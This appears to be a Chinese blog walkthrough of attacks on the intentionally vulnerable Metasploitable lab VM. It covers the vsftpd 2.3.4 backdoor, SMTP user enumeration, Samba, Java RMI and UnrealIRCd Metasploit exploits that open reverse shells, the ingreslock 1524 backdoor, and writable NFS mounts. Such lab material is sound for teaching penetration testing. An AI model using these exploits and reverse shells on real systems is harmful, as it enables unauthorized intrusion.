Metasploitable部分渗透

靶机:https://pan.baidu.com/s/10VnGGir_tV0Aewv_xdjc8w 提取码:3gm0

用户名:msfadmin

密码:msfadmin

端口号

漏洞

21

笑脸漏洞

25

用户名枚举

139,445

SMB

512,513,514

RSH系列

1099

java反序列化

1524

后门端口

2049

nsf文件共享

6667

IRC

VSFTP2.3.4

nmap扫描发现ftp版本为2.3.4,笑脸漏洞

方法一:

ftp登陆后连6200端口

还未进行ftp登陆时,6200端口是关闭的

现在进行ftp登录,在用户名后面加一个:)即可,密码任意

登陆后,再开启一个终端窗口,扫描6200端口是否开启

此时的6200端口已经开启,nc直接连接就行

方法二:

msfconsole

搜索vsftp,并使用此模块

exploit/unix/ftp/vsftpd_234_backdoor

配置相关参数

set rhost 目标IP

直接run

smtp用户名列举

进行用户列举前需要了解一点smtp

命令:

VRFY                    #验证指定用户是否存在,因安全原因常被禁止
MAIL FROM               # 命令中指定的地址是发件人地址
RCPT TO                 # 标识单个的邮件接收人;可有多个 RCPT TO;常在 MAIL 命令后面

状态码:

250        #操作完成
550        #未完成

方法一:

手动使用VRFY,MAIL FROM,RCPT TO命令来进行用户名枚举

VRFY:

MAIL FROM+RCPT TO相结合使用:

方法二:

使用工具smtp-user-enum

安装工具:sudo apt-get install smtp-user-enum 

相关选项

-m <number>   最大线程数(默认: 5)
-M <mode>  使用方法方式 EXPN, VRFY or RCPT (默认: VRFY)
-u <user>   指定用户
-f <addr>   邮箱地址,只能用在 "RCPT TO" mode (默认: user@example.com)
-D <domaim>   使用电子邮件地址添加到用户列表在域 (默认: none)使用邮箱代替用户名
-U <file>   通过smtp服务指定文件里的用户名检查
-t <host>   指定主机来运行smtp服务器主机服务
-T <file>   指定文件来运行smtp服务器主机服务
-p <port>   设置TCP端口号 (默认: 25)
-d   调试
-w   最大返回时间 (default: 5)
-v   版本
-h   帮助

方法三:

msfconsole

auxiliary/scanner/smtp/smtp_enum模块

set rhost 目标ip

配置好相关参数后run

等待爆破后获取用户名

SMB

SMB是用于windows,linux上的共享文件和打印机的通信协议

通过nmpa扫描我们发现,正在运行的SMB版本是3.x-4.x

可以使用

exploit/multi/samba/usermap_script模块进行渗透攻击

配置payload

这里使用linux的基础反向攻击即可

show payloads
set payload cmd/unix/reverse

配置相关配置

set rhost 目标ip
set lhost 攻击机ip

直接run即可

445端口也可

RLOGIN/RSH

rsh系列:在系统之后被错误配置从而允许远程访问者从任何地方访问

nmap扫描出512,513,514端口

使用这三个端口需要使用到rsh客户端

apt-get install rsh-client

rlogin

rsh

java RMI

Java RMI:Java远程方法调用,它是一种机制,允许一个Java虚拟机中的对象去访问和调用另一个Java虚拟机中包含的方法

nmap扫描出来1099端口

可以先使用msf中的扫描模块,扫描一下是否存在漏洞

auxiliary/scanner/misc/java_rmi_server

扫描结果表示,该靶机存在java_rmi漏洞

确定其存在漏洞后,使用攻击模块

exploit/multi/misc/java_rmi_server

配置相关参数

set rhost 目标ip
set lhost 攻击机ip

成功拿到shell

Ingreslock1524端口后门漏洞

nmap扫描到1524端口

判断其是一个后门端口

telnet登录即可

telnet 目标ip 1524

nfs文件共享

NFS是基于UDP/IP协议的应用,其实现主要是采用远程过程调用RPC机制,RPC提供了一组与机器、操作系统以及低层传送协议无关的存取远程文件的操作。

nmap扫描到2049端口,是nfs服务

使用nfs服务获取靶机的共享文件

获取到共享文件

新创建一个文件夹为tmp1,并将获取到的文件挂载到tmp1中

进入到tmp1中即可查看挂载的文件,不仅可以查看挂载的文件,同时还可以向里面写入文件

IRC漏洞

IRC:当pc上使用irc的客户端连接到服务端上,即可实现实时聊天

nmap扫描到6667端口

msf中使用exploit/unix/irc/unreal_ircd_3281_backdoor模块

设置payload为linux的反向链接

set payload cmd/unix/reverse

配置目标对象和监听对象

set rhost 目标ip
set lhost 攻击机ip

设置好了直接run

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值